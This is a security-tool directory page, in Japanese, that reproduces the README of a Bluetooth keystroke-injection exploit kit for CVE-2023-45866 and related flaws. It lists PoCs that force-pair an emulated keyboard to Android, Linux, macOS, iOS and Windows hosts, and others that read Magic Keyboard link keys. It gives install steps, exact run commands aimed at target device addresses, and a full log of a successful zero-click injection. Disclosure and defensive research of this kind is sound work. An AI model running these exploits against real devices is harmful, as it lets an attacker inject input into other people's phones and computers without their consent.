Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
hi_my_name_is_keyboard — エミュレートされたHIDキーボードを介してAndroid、Linux、macOS、iOSを標的とする、CVE-2023-45866、CVE-2024-21306、CVE-2024-0230のBluetoothキーストロークインジェクションエクスプロイトPoC。 | Kitploit
ツール/GitHubGitHub/marcnewlin/hi_my_name_is_keyboard
AndroidセキュリティBluetoothセキュリティiOSセキュリティエクスプロイトワイヤレスセキュリティモバイルセキュリティハードウェアとIoTセキュリティ敵対的攻撃

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
marcnewlin/hi_my_name_is_keyboard

hi_my_name_is_keyboard

エミュレートされたHIDキーボードを介してAndroid、Linux、macOS、iOSを標的とする、CVE-2023-45866、CVE-2024-21306、CVE-2024-0230のBluetoothキーストロークインジェクションエクスプロイトPoC。

リポジトリを見る
731113242年前Kitploit レビュー済み

こんにちは、私の名前は Keyboard です

このリポジトリには、CVE-2023-45866、CVE-2024-21306、CVE-2024-0230 の概念実証スクリプトが含まれています。詳細はブログ記事を参照してください。

概念実証説明
Android キーストロークインジェクション仮想 Bluetooth キーボードを脆弱な Android デバイスに強制ペアリングし、10 秒間 tab キー押下を注入します。
Linux キーストロークインジェクション仮想 Bluetooth キーボードを Linux ホストに強制ペアリングし、10 秒間 tab キー押下を注入します。
macOS キーストロークインジェクション仮想 Bluetooth キーボードを macOS ホストに強制ペアリングし、キーストロークを注入して Web ブラウザを開き、Google 検索を実行します。
iOS キーストロークインジェクション仮想 Bluetooth キーボードを iOS ホストに強制ペアリングし、キーストロークを注入して Web ブラウザを開き、URL に移動します。
Windows キーストロークインジェクション仮想 Bluetooth キーボードを Windows ホストに強制ペアリングし、tab キー押下を注入します。
Lightning ポート経由の Magic Keyboard リンクキーMagic Keyboard の Lightning ポートから Bluetooth リンクキーを読み取ります。
Bluetooth 経由の Magic Keyboard リンクキーMagic Keyboard の認証されていない Bluetooth HID サービスから Bluetooth リンクキーを読み取ります。
Mac の USB ポート経由の Magic Keyboard リンクキーペアリング済みの Mac に対して USB 経由でキーボードを偽装し、対象の Magic Keyboard の Bluetooth リンクキーを読み取ります。

依存関係

これらのスクリプトは、Broadcom ベースの Bluetooth アダプタを搭載した Ubuntu 22.04 ホストで動作することが確認されています。

主にこのアダプタを使用しました: https://www.amazon.com/Kinivo-USB-Bluetooth-4-0-Compatible/dp/B007Q45EF4``` Bus 001 Device 026: ID 0a5c:21e8 Broadcom Corp. BCM20702A0 Bluetooth 4.0

Ubuntu 22.04 のクリーンインストール環境から、以下のコマンドで依存関係をインストールできます。```
# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

キーストロークインジェクション

Android キーストロークインジェクション

Android デバイスは、2023-12-05 のセキュリティパッチレベルより前のバージョンでは脆弱です。

パッチが適用されていない Android デバイスで Bluetooth が有効になっている場合、攻撃者はエミュレートされた Bluetooth キーボードをペアリングし、ユーザーの確認なしでキーストロークを注入できます。これは、Bluetooth が有効になっている限り機能するゼロクリック攻撃です。

影響を受けるバージョン

この脆弱性は Android ~4.2.2 以降に影響します。

  • Android 4.2.2 - 10 はパッチが適用されません
  • Android 11 - 14 にはパッチが利用可能です(2023-12-05 セキュリティパッチレベル)
  • Pixel 6、7、8 はパッチ適用済みです
  • Pixel 5 以前は依然として脆弱です

開始時の状態

  • 対象の Android デバイスで Bluetooth が有効になっている

PoC の実行

インターフェース hci1 を使用して、Android デバイス 5C:F3:70:AA:07:BD を対象に PoC を実行します。``` ./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD

成功した場合、PoCは10秒間`tab`キーストロークのペイロードを注入します。

#### 出力例```
> ./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
[2024-01-07 11:03:01.329]  executing 'sudo service bluetooth restart'
[2024-01-07 11:03:01.959]  configuring Bluetooth adapter
[2024-01-07 11:03:01.963]  calling RegisterProfile
[2024-01-07 11:03:01.966]  running dbus loop
[2024-01-07 11:03:02.096]  executing 'sudo hciconfig hci1 name Hi, My Name is Keyboard'
[2024-01-07 11:03:02.108]  executing 'hciconfig hci1 name'
[2024-01-07 11:03:02.128]  executing 'sudo hciconfig hci1 class 0x002540'
[2024-01-07 11:03:02.141]  executing 'hciconfig hci1 class'
[2024-01-07 11:03:02.144]  executing 'hcitool name 5C:F3:70:AA:07:BD'
[2024-01-07 11:03:02.877]  connecting to SDP
[2024-01-07 11:03:02.877]  connecting to 5C:F3:70:AA:07:BD on port 1
[2024-01-07 11:03:03.832]  SUCCESS! connected on port 1
[2024-01-07 11:03:03.832]  executing 'sudo btmgmt --index hci1 io-cap 1'
[2024-01-07 11:03:03.847]  executing 'sudo btmgmt --index hci1 ssp 1'
[2024-01-07 11:03:03.858]  connected to SDP (L2CAP 1) on target
[2024-01-07 11:03:03.865]  'NoInputNoOutput' pairing-agent is running
[2024-01-07 11:03:04.111]  connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:04.864]  ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-01-07 11:03:04.864]  connecting to 5C:F3:70:AA:07:BD on port 17
[2024-01-07 11:03:04.932]  SUCCESS! connected on port 17
[2024-01-07 11:03:04.932]  connecting to HID Interrupt
[2024-01-07 11:03:04.932]  connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:05.008]  SUCCESS! connected on port 19
[2024-01-07 11:03:05.008]  connected to HID Interrupt (L2CAP 19) on target
[2024-01-07 11:03:05.008]  connected to HID Control (L2CAP 17) on target
[2024-01-07 11:03:05.009]  [RX-17] 9000
[2024-01-07 11:03:05.009]  [TX-17] 00
[2024-01-07 11:03:05.065]  [RX-19] a20101
[2024-01-07 11:03:05.259]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.259]  injecting Tab keypresses for 10 seconds
[2024-01-07 11:03:05.259]  [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.264]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.318]  [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.323]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.377]  [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.382]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.436]  [TX-19] a10100002b000000000000
...
[2024-01-07 11:03:15.261]  [TX-19] a101000000000000000000
[2024-01-07 11:03:15.319]  payload has been transmitted; disconnecting Bluetooth HID client
[2024-01-07 11:03:15.321]  taking 'hci1' offline

Linux キーストロークインジェクション

BlueZ 5 を実行している Linux ホストは、2023年12月頃に展開されたパッチより前のバージョンでは脆弱です。具体的なバージョン番号は Linux ディストリビューションによって異なります。

パッチが適用されていない Linux ホストが Bluetooth 経由で検出可能かつ接続可能な場合、攻撃者はエミュレートされた Bluetooth キーボードをペアリングし、ユーザーの確認なしでキーストロークを注入できます。これは、ホストが検出可能かつ接続可能な状態であればいつでも機能するゼロクリック攻撃です。

影響を受けるバージョン

この脆弱性は、BlueZ 5 のデフォルト構成を使用しているパッチ未適用の Linux ディストリビューションに影響することが分かっています。

Google は ChromeOS がこの脆弱性の影響を受けなかったと述べており、ChromeOS はこの調査の一部としてテストされていませんが、その BlueZ 構成は攻撃を防いでいるように見えます。

影響を受けるディストリビューションには、Ubuntu、Debian、Gentoo、Arch、Fedora、Red Hat、Yocto、Amazon Linux が含まれます。複数のリリースが影響を受ける可能性があり、例えば Ubuntu は 16.04、18.04、20.04、22.04、23.04、23.10 にパッチを適用しました。

開始状態

  • 対象の Linux ホストが Bluetooth 経由で検出可能かつ接続可能であること。
  • Linux ホストは、Bluetooth 設定パネルが開いているときに、通常、検出可能かつ接続可能な状態になります。

PoC の実行

インターフェース hci1 を使用して、Linux ホスト 58:28:39:E6:AE:1C を対象に PoC を実行します。``` ./keystroke-injection-android-linux.py -i hci1 -t 58:28:39:E6:AE:1C

成功した場合、PoC は10秒間 `tab` キーストロークのペイロードを注入します。
ツールをダウンロード